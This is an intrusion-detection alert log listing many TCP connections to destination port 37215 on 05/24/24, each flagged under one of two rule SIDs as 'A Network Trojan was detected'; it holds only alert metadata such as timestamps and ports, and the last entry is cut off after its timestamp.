              Timestamp:05/24/24-10:59:36.460462
              SID:2829579
              Source Port:38574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518586
              SID:2829579
              Source Port:60762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671655
              SID:2835222
              Source Port:56800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341166
              SID:2829579
              Source Port:33572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478383
              SID:2829579
              Source Port:57700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231807
              SID:2829579
              Source Port:59138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.884644
              SID:2835222
              Source Port:51658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878005
              SID:2829579
              Source Port:37976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536638
              SID:2835222
              Source Port:40848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269284
              SID:2829579
              Source Port:38812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099853
              SID:2835222
              Source Port:47354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166186
              SID:2829579
              Source Port:42314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.462819
              SID:2835222
              Source Port:56258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249953
              SID:2829579
              Source Port:37232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724772
              SID:2835222
              Source Port:42360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.158846
              SID:2829579
              Source Port:35070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802384
              SID:2829579
              Source Port:37346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.836413
              SID:2835222
              Source Port:43204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859492
              SID:2835222
              Source Port:36230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.409141
              SID:2835222
              Source Port:54998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313779
              SID:2829579
              Source Port:44078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536023
              SID:2835222
              Source Port:36624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504674
              SID:2829579
              Source Port:34318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573869
              SID:2835222
              Source Port:46138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.406588
              SID:2835222
              Source Port:50130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631874
              SID:2835222
              Source Port:42644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.108932
              SID:2829579
              Source Port:43300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860321
              SID:2829579
              Source Port:36052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.453739
              SID:2829579
              Source Port:47696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118497
              SID:2835222
              Source Port:43658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377450
              SID:2829579
              Source Port:59818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518963
              SID:2829579
              Source Port:50614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.327772
              SID:2829579
              Source Port:40784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550727
              SID:2835222
              Source Port:58434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208981
              SID:2835222
              Source Port:34896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631379
              SID:2835222
              Source Port:53156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456811
              SID:2829579
              Source Port:39494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520265
              SID:2835222
              Source Port:57626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168158
              SID:2829579
              Source Port:56560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.604713
              SID:2829579
              Source Port:47380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.394036
              SID:2829579
              Source Port:60274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477135
              SID:2829579
              Source Port:33944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.696983
              SID:2829579
              Source Port:37058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341076
              SID:2829579
              Source Port:40672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.123635
              SID:2835222
              Source Port:42434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.285896
              SID:2829579
              Source Port:52080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098165
              SID:2835222
              Source Port:53004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640822
              SID:2829579
              Source Port:49110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692670
              SID:2829579
              Source Port:50502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856518
              SID:2835222
              Source Port:47266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103567
              SID:2829579
              Source Port:38398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802073
              SID:2835222
              Source Port:42176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481701
              SID:2835222
              Source Port:56202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098266
              SID:2835222
              Source Port:55810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045245
              SID:2829579
              Source Port:39430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149117
              SID:2835222
              Source Port:43396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197935
              SID:2835222
              Source Port:53916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663483
              SID:2829579
              Source Port:35900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486439
              SID:2835222
              Source Port:35792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663577
              SID:2829579
              Source Port:39218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168537
              SID:2829579
              Source Port:57978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.096715
              SID:2835222
              Source Port:43090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518934
              SID:2829579
              Source Port:51422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128079
              SID:2835222
              Source Port:52736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053866
              SID:2835222
              Source Port:35244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152701
              SID:2835222
              Source Port:52424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100849
              SID:2829579
              Source Port:50990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536880
              SID:2829579
              Source Port:48142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165761
              SID:2829579
              Source Port:50668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235466
              SID:2829579
              Source Port:43216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055508
              SID:2835222
              Source Port:48268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313247
              SID:2835222
              Source Port:48762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860007
              SID:2829579
              Source Port:50880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300322
              SID:2835222
              Source Port:54400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279179
              SID:2835222
              Source Port:53496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433778
              SID:2829579
              Source Port:55506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483647
              SID:2835222
              Source Port:34592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099862
              SID:2829579
              Source Port:34494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507145
              SID:2835222
              Source Port:57738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.682232
              SID:2829579
              Source Port:52486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432351
              SID:2829579
              Source Port:41628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053326
              SID:2835222
              Source Port:36828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520183
              SID:2829579
              Source Port:41000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581812
              SID:2835222
              Source Port:60170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232538
              SID:2835222
              Source Port:41476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860342
              SID:2829579
              Source Port:40082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.458299
              SID:2835222
              Source Port:47454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799386
              SID:2835222
              Source Port:58954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078724
              SID:2835222
              Source Port:50306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358933
              SID:2829579
              Source Port:55810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432304
              SID:2829579
              Source Port:47674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.120449
              SID:2829579
              Source Port:48900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278205
              SID:2835222
              Source Port:40354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372070
              SID:2829579
              Source Port:39524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536808
              SID:2835222
              Source Port:33026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.488237
              SID:2829579
              Source Port:58478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115945
              SID:2829579
              Source Port:42342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.743087
              SID:2835222
              Source Port:32888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918263
              SID:2835222
              Source Port:36956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542238
              SID:2835222
              Source Port:37270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522568
              SID:2829579
              Source Port:35390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411754
              SID:2835222
              Source Port:47560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749212
              SID:2829579
              Source Port:52528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664981
              SID:2835222
              Source Port:38472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116020
              SID:2829579
              Source Port:55344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112651
              SID:2829579
              Source Port:39960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076885
              SID:2829579
              Source Port:44550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.382783
              SID:2835222
              Source Port:39264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254405
              SID:2835222
              Source Port:58950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457742
              SID:2829579
              Source Port:50040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857773
              SID:2835222
              Source Port:35220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161327
              SID:2829579
              Source Port:56432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576466
              SID:2829579
              Source Port:56922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252558
              SID:2829579
              Source Port:39884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858426
              SID:2829579
              Source Port:60638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155040
              SID:2829579
              Source Port:48730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.750566
              SID:2835222
              Source Port:49090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638487
              SID:2835222
              Source Port:44552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483117
              SID:2835222
              Source Port:55240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624403
              SID:2835222
              Source Port:46136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490477
              SID:2829579
              Source Port:32796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188789
              SID:2835222
              Source Port:34722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.196907
              SID:2829579
              Source Port:40350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.543751
              SID:2835222
              Source Port:42148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727378
              SID:2835222
              Source Port:39384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113712
              SID:2835222
              Source Port:56212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991835
              SID:2835222
              Source Port:42510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.772722
              SID:2829579
              Source Port:57854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.482980
              SID:2829579
              Source Port:41460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928904
              SID:2835222
              Source Port:42616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575504
              SID:2829579
              Source Port:48138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882435
              SID:2835222
              Source Port:50798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446477
              SID:2829579
              Source Port:53686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575826
              SID:2835222
              Source Port:37924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.628034
              SID:2835222
              Source Port:45016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278345
              SID:2835222
              Source Port:32960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693130
              SID:2829579
              Source Port:40322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.819799
              SID:2835222
              Source Port:55814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332206
              SID:2829579
              Source Port:45740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623445
              SID:2835222
              Source Port:53138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.994384
              SID:2835222
              Source Port:34976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.796468
              SID:2829579
              Source Port:34550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340816
              SID:2835222
              Source Port:51050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536392
              SID:2835222
              Source Port:56552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.885287
              SID:2829579
              Source Port:40970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154086
              SID:2829579
              Source Port:49684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544291
              SID:2829579
              Source Port:44510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525768
              SID:2835222
              Source Port:52350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334237
              SID:2829579
              Source Port:41876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485921
              SID:2835222
              Source Port:46960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857143
              SID:2829579
              Source Port:55982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189421
              SID:2829579
              Source Port:47720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448689
              SID:2835222
              Source Port:40446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.817641
              SID:2835222
              Source Port:54912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.529841
              SID:2835222
              Source Port:39152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635834
              SID:2829579
              Source Port:52776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693151
              SID:2829579
              Source Port:36242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150557
              SID:2829579
              Source Port:53322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397799
              SID:2835222
              Source Port:49552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233897
              SID:2829579
              Source Port:45758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.458343
              SID:2835222
              Source Port:49004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517284
              SID:2829579
              Source Port:57818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302907
              SID:2829579
              Source Port:49734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432273
              SID:2829579
              Source Port:41532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198594
              SID:2829579
              Source Port:45982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547037
              SID:2829579
              Source Port:48274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432472
              SID:2829579
              Source Port:42722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.883683
              SID:2835222
              Source Port:43698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459629
              SID:2829579
              Source Port:40852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505025
              SID:2829579
              Source Port:58780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457748
              SID:2835222
              Source Port:43766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.994230
              SID:2835222
              Source Port:60914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.076458
              SID:2829579
              Source Port:41260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575270
              SID:2829579
              Source Port:44754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207241
              SID:2829579
              Source Port:56462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064529
              SID:2829579
              Source Port:58782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535759
              SID:2829579
              Source Port:44064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480118
              SID:2835222
              Source Port:35432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526944
              SID:2829579
              Source Port:53134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070985
              SID:2829579
              Source Port:45760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233450
              SID:2835222
              Source Port:50672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.169188
              SID:2829579
              Source Port:52250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279687
              SID:2829579
              Source Port:51406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.434487
              SID:2829579
              Source Port:45866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425498
              SID:2829579
              Source Port:59170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.193873
              SID:2835222
              Source Port:52806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622922
              SID:2829579
              Source Port:42634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.701030
              SID:2829579
              Source Port:53380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097345
              SID:2835222
              Source Port:45428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663551
              SID:2829579
              Source Port:44154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055720
              SID:2835222
              Source Port:35408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.369064
              SID:2829579
              Source Port:43242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.518831
              SID:2829579
              Source Port:50786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858351
              SID:2829579
              Source Port:45834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279066
              SID:2835222
              Source Port:40468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.113696
              SID:2829579
              Source Port:36530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.345284
              SID:2835222
              Source Port:46058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857754
